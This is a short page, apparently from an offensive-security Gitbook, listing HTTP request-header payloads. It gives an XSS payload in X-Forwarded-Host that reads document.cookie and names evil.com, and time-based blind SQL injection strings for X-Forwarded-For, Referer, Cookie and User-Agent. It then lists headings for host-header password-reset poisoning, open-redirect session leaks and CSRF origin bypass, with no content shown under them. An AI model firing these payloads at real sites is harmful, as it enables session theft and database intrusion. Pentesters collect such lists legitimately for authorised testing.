HTTP Header Exploitation
Request Header payloads (xss, SQLi, etc.)
Basic Payload
X-Forwarded-Host: evil.com"><img src/onerror=prompt(document.cookie)>
X-Forwarded-Host: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
Referer: https://site.com/'+(select*from(select(sleep(10)))a)+'
Cookie: 'XOR(if(now()=sysdate(),sleep(10),0))XOR'
User-Agent: "XOR(if(now()=sysdate(),sleep(10),0))XOR"Testing
XSS
XSSCommand Injection
SQLi
Time Based SQLi
Open Redirect + Referer → Session Leak
Open RedirectionScenario
Exploit Flow
Host Header Injection → Password Reset Poisoning
Password ResetScenario
Exploit Flow
CSRF + Origin Header Bypass
CSRFScenario
Exploit Flow
Tool
Resources
Interesting Books
Interesting BooksSupport this Gitbook
Last updated
